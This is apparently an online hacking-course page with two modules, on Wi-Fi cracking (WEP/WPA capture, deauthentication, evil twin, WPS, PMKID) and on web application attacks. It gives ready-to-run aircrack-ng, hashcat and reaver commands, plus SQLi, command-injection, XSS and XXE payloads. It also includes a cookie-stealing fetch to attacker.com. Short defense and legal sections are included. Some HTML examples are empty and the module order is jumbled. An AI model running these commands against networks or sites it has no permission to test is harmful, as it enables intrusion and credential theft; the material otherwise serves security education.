Cybersume

Wireless Network Hacking

Introduction to Wireless Security

Wireless networks (Wi-Fi) are vulnerable to various attacks due to weak encryption, misconfigurations, and physical accessibility. This guide covers **reconnaissance, exploitation, and defense** techniques for both **WEP, WPA/WPA2, and WPA3** networks.

1. Wireless Reconnaissance

A. Identifying Networks

- Scan for nearby networks:

bash

sudo iwconfig # List available interfaces

sudo airmon-ng start wlan0 # Enable monitor mode

sudo airodump-ng wlan0mon # Scan networks

Key details :

-BSSID (MAC address of AP)

- ESSID (Network name)

- Channel, Encryption (WEP/WPA/WPA2)

B. Target Selection

- Prioritize weak networks :

- WEP (Easily crackable)

- WPA/WPA2-PSK (Vulnerable to brute force)

- Open Wi-Fi (No encryption)

2. Wireless Attacks

A. WEP Cracking (Outdated but Still Found)

WEP uses RC4 encryption and is easily crackable due to IV (Initialization Vector) reuse.

Steps:

1. Capture packets:

bash

sudo airodump-ng -c <channel> --bssid <BSSID> -w wep_crack wlan0mon

2. Force IV generation (ARP replay attack):

bash

sudo aireplay-ng -3 -b <BSSID> -h <client_MAC> wlan0mon

3. Crack with aircrack-ng:

bash

sudo aircrack-ng wep_crack-01.cap

B. WPA/WPA2 Cracking

WPA/WPA2-PSK (Pre-Shared Key) is vulnerable to brute force/dictionary attacks.

Steps:

1. Capture WPA Handshake (4-way authentication):

bash

sudo airodump-ng -c <channel> --bssid <BSSID> -w handshake wlan0mon

2. Deauthenticate a client to force reconnection:

bash

sudo aireplay-ng -0 5 -a <BSSID> -c <client_MAC> wlan0mon

3. Crack with hashcat or aircrack-ng :

bash

aircrack-ng -w rockyou.txt handshake-01.cap

bash

hashcat -m 22000 handshake.hc22000 rockyou.txt

C. Evil Twin Attack (Rogue AP)

- Creates a fake Wi-Fi network to steal credentials.

Tools : airbase-ng , hostapd-wpe .

Steps:

1. Set up rogue AP:

bash

sudo airbase-ng -a <BSSID> --essid "Free_WiFi" -c <channel> wlan0mon

2. Redirect traffic:

bash

sudo dnschef -i <interface> --fakeip 192.168.1.1

3. Capture credentials when victims connect.

D. WPS (Wi-Fi Protected Setup) Attack

- WPS PIN brute force (if enabled).

Tools : reaver , bully.

Steps:

bash

sudo reaver -i wlan0mon -b <BSSID> -vv -K 1

E. KRACK Attack (Key Reinstallation Attack)

- Exploits WPA2's 4-way handshake vulnerability.

Tool : krackattacks-scripts .

Steps:

1. Monitor network traffic.

2. Forge handshake packets to intercept data.

3. Advanced Attacks

A. PMKID Attack (WPA/WPA2)

- Extracts PMKID (Pairwise Master Key ID) without handshake.

Tool : hcxdumptool , hashcat .

Steps:

1. Capture PMKID:

bash

sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

2. Crack with hashcat :

bash

hashcat -m 16800 pmkid.hc16800 rockyou.txt

B. WPA3 Downgrade Attack

- Forces WPA3 → WPA2 fallback.

Tool : dragonblood .

4. Defensive Measures

A. Securing Wi-Fi Networks

✔ Use WPA3-SAE (if available)

✔ Disable WPS (Vulnerable to brute force)

✔ Use strong passwords (Avoid dictionary words)

✔ Enable MAC filtering (Whitelist devices)

✔ Disable SSID broadcasting (Hidden network)

✔ Monitor for rogue APs (Airodump-ng, Kismet)

B. Detection Tools

- Wireshark (Analyze Wi-Fi traffic)

- Kismet (Wireless IDS)

- Aircrack-ng (Test security)

5. Hands-On Lab

Lab: Cracking WPA2 with Aircrack-ng

1. Enable monitor mode :

bash

sudo airmon-ng start wlan0

2. Scan networks:

bash

sudo airodump-ng wlan0mon

3. Capture handshake :

bash

sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon

4. Deauth a client :

bash

sudo aireplay-ng -0 5 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon

5. Crack the handshake :

bash

sudo aircrack-ng -w rockyou.txt capture-01.cap

6. Legal & Ethical Considerations

⚠ Only hack networks you own or have permission to test.

⚠ Unauthorized access is illegal (Computer Fraud and Abuse Act, etc.).

Conclusion

- WEP is trivial to crack (RC4 weakness).

- WPA/WPA2 is vulnerable to brute force (Weak passwords).

- WPA3 improves security but has downgrade risks.

- Evil Twin & WPS attacks are still effective.

🔹 Next Steps:

Module 9: Social Engineering & Phishing

- Try Wi-Fi challenges on Hack The Box / TryHackMe.

- Learn RF hacking (Bluetooth, Zigbee).

- Explore enterprise Wi-Fi security (RADIUS, 802.1X).

Would you like a step-by-step Evil Twin attack demo? 🚀

Web Application Hacking

Introduction to Web App Security

Web applications are prime targets for attackers due to their exposure to the internet. This guide covers vulnerabilities, exploitation techniques, and defenses.

1. Web App Reconnaissance

Information Gathering

- WHOIS Lookup (Domain details)

- Subdomain Enumeration (Sublist3r, Amass)

- Technology Stack Detection (Wappalyzer, BuiltWith)

- Directory Bruteforcing (Dirb, Gobuster)

- Wayback Machine (Historical snapshots)

Tools

bash

sublist3r -d example.com

wappalyzer.com

gobuster dir -u https://example.com -w /path/to/wordlist.txt

2. Common Web Vulnerabilities

A. Injection Attacks

1. SQL Injection (SQLi)

- Classic SQLi: ' OR 1=1 -- -

- Blind SQLi: Time-based/Boolean-based

Tools: SQLmap, Burp Suite

Example:

sql

SELECT * FROM users WHERE username = 'admin'--' AND password = ''

2. Command Injection

- Executing OS commands via input fields:

bash

; cat /etc/passwd

3. Cross-Site Scripting (XSS)

- Stored XSS : <script>alert(1)</script>

- Reflected XSS : https://example.com/search?q=<script>alert(1)</script>

- DOM XSS: Browser-side script execution

B. Broken Authentication

1. Credential Stuffing

- Using breached passwords

Tools : Hydra, Burp Intruder

2. Session Hijacking

- Stealing cookies via XSS/MITM

Tools : Ferret, Hamster

3. Default Credentials

- admin:admin , root:password

C. Sensitive Data Exposure

1. Insecure APIs

- Exposed API keys, tokens

Tools : Postman, Burp Suite

2. Directory Listing

- /backup, /admin accessible

D. Security Misconfigurations

1. Exposed Admin Panels

- /admin , /wp-admin

2. Verbose Error Messages

- Leaking stack traces, DB info

E. Cross-Site Request Forgery (CSRF)

- Forcing users to execute unwanted actions:

html

F. Server-Side Request Forgery (SSRF)

- Accessing internal services:

https://example.com/fetch?url=http://localhost

G. XML External Entity (XXE)

- Reading local files via XML:

xml

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

3. Exploitation Techniques

Step 1: Automated Scanning

- Burp Suite (Manual testing)

- OWASP ZAP (Automated scanning)

- Nikto (Vulnerability scanner)

Step 2: Manual Testing

- Intercepting requests (Burp Proxy)

- Tampering parameters (Headers, cookies)

- Fuzzing inputs (Wfuzz, FFUF)

Step 3: Post-Exploitation

- Privilege escalation

- Data exfiltration

- Persistence mechanisms

4. Hands-On Labs

Lab 1: SQL Injection with SQLmap

1. Find vulnerable parameter:

bash

sqlmap -u "https://example.com/login?id=1" --dbs

2. Dump database:

bash

sqlmap -u "https://example.com/login?id=1" -D dbname --tables

Lab 2: XSS Exploitation

1. Inject payload in search box:

html

2. Steal cookies:

javascript

fetch('https://attacker.com/log?cookie=' + document.cookie)

Lab 3: CSRF Attack

1. Craft malicious HTML:

html

</form>

5. Defensive Measures

Secure Coding Practices

- Input validation

- Prepared statements (SQLi)

- CSP headers (XSS)

- CSRF tokens

Security Tools

- WAFs (ModSecurity, Cloudflare)

- DAST/SAST Scanners (Checkmarx, SonarQube)

- Honeypots (Glastopf)

6. Bug Bounty & Ethical Hacking

Platforms : HackerOne, Bugcrowd

Methodology:

1. Recon

2. Vulnerability Scanning

3. Exploitation

4. Reporting

Conclusion

- Web app hacking involves recon, exploitation, and post-exploitation.

- OWASP Top 10 is a must-know for pentesters.

- Automated tools + manual testing = Best approach.

🔹 Next Steps:

Module 8: Wireless Network Hacking

- Practice on DVWA, WebGoat.

- Try HTB, TryHackMe web challenges.

- Learn advanced Burp Suite techniques.

Would you like a deep dive into bypassing WAFs? 🚀